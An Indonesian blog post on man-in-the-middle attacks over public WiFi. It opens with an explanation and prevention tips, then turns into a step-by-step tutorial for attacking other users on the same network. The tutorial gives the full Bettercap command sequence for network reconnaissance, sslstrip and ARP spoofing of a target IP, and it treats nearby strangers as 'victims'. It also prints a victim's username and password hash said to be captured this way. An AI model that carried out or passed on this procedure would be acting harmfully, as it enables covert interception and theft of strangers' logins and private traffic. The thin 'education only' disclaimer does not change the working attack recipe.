Kamu Ingin Request Artikel? Klik Oke :)
Beranda
Hacker
Nasional

Bahaya MITM Attack, Bisa Meretas HP Lewat Wifi

Waspada Dan Hati-Hati Dalam Mengunakan Wifi

Baca Juga

Assalamualaikum Brother

Jika kalian adalah salah satu orang yang sering menggunakan WIFI public yang terbuka dan dapat diakses secara umum, maka kalian harus berhati-hati dengan serangan MITM karna ada resiko di balik WIFI public yang sering diakses olah banyak orang. Biasanya seperti WIFI umum yang tersedia pada kedai,cafee,pegadaian ataupun warung-warug biasa.

Namun perlu kalian ketahui, jika dalam suatu jaringan WIFI seseorang bisa melakukan serangan cyber terhadap ponsel kita. sumber utamanya adalah WIFI. karna kita berada pada satu jaringan dengan si penyerang maka dengan mudah attacker dapat melakukan MITM Attack, apa itu MITM? Berikut ini adalah penjelasannya.

Apa itu MITM Attack?

MITM atau jelasnya Man In The Middle yaitu merupakan serangan Cyber yang terjadi ketika komunikasi antara dua belah pihak atau sistem dicegat oleh pihak ketiga, yaitu si penyerang secara diam-diam mengambil informasi pribadi dan memata-matai si korban.

Dampak dari MITM Attack

Serangan ini cukup berbahaya karena sebagian besar orang tidak sadar bahwa mereka sedang menjadi korban, dampaknya beberapa informasi sensitif seperti password gemail ataupun isi chating juga dapat dilihat oleh pelaku kejahatan MITM Attack.

Lalu bagaimana cara mencegahnya? agar kita terhindar dari serangan MITM saya akan memberikan beberapa tips yang mungkin akan berguna bagi kalian yang pembaca, agar dapat menjaga kemanan data pribadi kita ketika menggunkan WIFI, khusus nya jika kalian sering menggunakan WIFI umum.

Tips agar terhindar dari serangan MITM (Man In The Middle)

  1. Selalu waspada dalam menggunakan jaringan WIFI publik gratis.
  2. Hindari pemakaian WIFI umum yang banyak diakses oranglain.
  3. Jangan gunakan SSIDS atau (Nama WIFI) yang mencurigakan.
  4. Gunaka VPN jika tersedia saat menggunakan WIFI publik gratis.
  5. Nonaktifkan pengaturan WIFI (terhubung secara otomatis) pada jaringan.
  6. Pastikan website yang di kunjungi sudah dilengkapi dengan SSL atau (HTTPS)
  7. Jangan melakukan aktivitas online banking atau memasukan kredensial akun pribadi ketika terhubung di jaringan WIFI publik gratis.

Itulah tadi beberapa tips agar kalian terhindar dari MITM Attack, selalu waspada dan jangan menggunakan jaringan WIFI sembarangan.

Jika tadi kita sudah membahas tentang cara mencegahnya, maka sekarang saya akan membahas bagaimana caranya melakukan MITM Attack, tentunya ini hanya untuk sekedar edukasi saja. tergantung bagaimana kamu memanfaatkan ilmu yang kamu miliki.

Cara melakukan serangan MITM Attack pada jaringan WIFI

Untuk melakukan Man In The Middle Attack kita membutuhkan beberapa alat, yaitu Arp-Scan dan Bettercap. kedua alat ini memiliki peran yang sangat penting ketika si penyerang akan melakukan aksinya, terutama Bettercap.

Fungsi Arp-Scan

Arp-Scan berfungsi untuk melihat identitas dari suatu host yg terhubung ke dalam suatu jaringan. Seperti : ip address, mac address, dan vendor dari hardware interface yg terhubung ke sebuah jaringan. Karena ancaman keamanan muncul ketika ada upaya manipulasi terhadap peng-alamatan nomor IP dan MAC address. Proses ini biasa disebut dengan istilah ARP spoofing atau ARP poisoning, bertujuan untuk mencari mana saja komputer yang terhubung dengan koneksi terbuka (saling percaya).

Fungsi Bettercap

Bettercap memiliki fungsi utama sebagai alat spoofing WIFI & Bluetooth, dengan alat ini kita dapat melakukan serangan MITM, memata-matai dan mengambil informasi sensitif melalui jaringan WIFI ataupun Bluetooth yang di akses oleh korban. untuk detailnya silahkan kunjungi situs berikut ini https://www.bettercap.org.

Sebelum melakukan praktik MITM Attack, silahkan kalian install terlebih dahulu kedua alat diatas dengan perintah di bawah ini. pastikan jika anda adalah pengguna OS Linux. Untuk aktivitas hacking Linux sangat memadai karna dilengkapi banyak alat-alat Hacking.

sudo apt install arp-scan

sudo apt install bettercap

Jika kedua alat sudah terinstall, sekarang jalankan tools Bettercap dengan perintah berikut ini. Namun sebelumya pastikan dulu kalian sudah terhubung pada jaringan WIFI dan terdapat beberapa orang juga yang terhubung pada jaringan WIFI yang sama.

sudo bettercap

Jika bettercap sudah dapat kamu jalankan, sekarang waktunya memidai apakah ada orang lain yang terhubung pada jaringan WIFI atau tidak. Jika ada selamat itu adalah korban MITM pertama kamu! jalankan perintah berikut ini pada bettercap.

net.recon on

Pada gambar diatas menampilkan informasi device yang terhubung satu jaringan dengan kita, menampilkan informasi seperti alamat IP dan nama HP korban. Kemudian selanjutnya tinggal kita eksekusi target. Sebelum melakukan eksekusi seting terlebih dahulu beberapa module bettercap agar prosses MITM Attack dapat berjalan dengan sempurna.

set https.proxy.sslstrip true

set arp.spoof.internal true

Perintah diatas berfungsi untuk mengubah atau memanipulasi SSL dari HTTPS menjadi HTTP, kenapa harus jadi HTTP? jelas harus, karna HTTPS adalah versi paling aman yang dilengkapi dengan enkripsi, hal itu akan menyebabkan data yang dihasilkan tidak dapat kita lihat karna hasil output dari SSL/HTTPS yang sudah ter-enkripsi. Oleh karna itu kita harus merubahnya jadi HTTP agar seluruh data yang di hasilkan oleh bettercap dapat kita lihat sepenuhnya.

Sekarang pilih salah satu target yang terhubung pada jaringan WIFI, salin alamat IP target lalu eksekusi dengan perintah seperti dibawah ini.

set arp.spoof.targets 172.0.1.66

Ganti alamat IP yang saya tandai dengan alamat IP target kalian, selanjutnya kita seting kembali beberapa module bettercap dengan perintah di bawah ini.

set net.sniff.verbose false

https.proxy on

http.proxy on

arp.spoof on

net.sniff on

net.probe on

Jika semua module sudah kita seting, tinggal menunggu data yang di hasilnkan oleh bettercap. ini tergantung pada aktifitas target pada semartphone. seperti contoh berikut ini adalah hasil data yang saya dapatkan dari korban.

Pada gambar diatas terlihat korban melakukan login pada suatus situs web, dengan username: nabila58 dan juga password dalam bentuk hash md5 : 60a0561f74204b49d5a9774b09ec9df1 (nabila58), kemudian target juga melakukan aktifitas pada whatsapp tampaknya sedang chating, berikut ini data yang saya dapatkan.

Sayang sekali data yang berisi chating pada WA target terenkripsi oleh SSL jadi tidak dapat dilihat, atau mungkin karna WhatsApp mempunyai fitur enksipsi end to end, jadi sepertinya mustahil sekali melihat isi chating WA korban dengan trick MITM.

Psean dari penulis

Sekian artikel dari saya, semoga bermanfaat. penulis tidak bertanggung jawab atas penyalah gunaan trick Hacking MITM diatas, karna artikel ini dibuat hanya untuk edukasi dan pembelajaran seputar dunia Cyber Security. Kalian boleh request tips lainnya di kolom komentar!

Source : www.xploit.my.id

Posting Komentar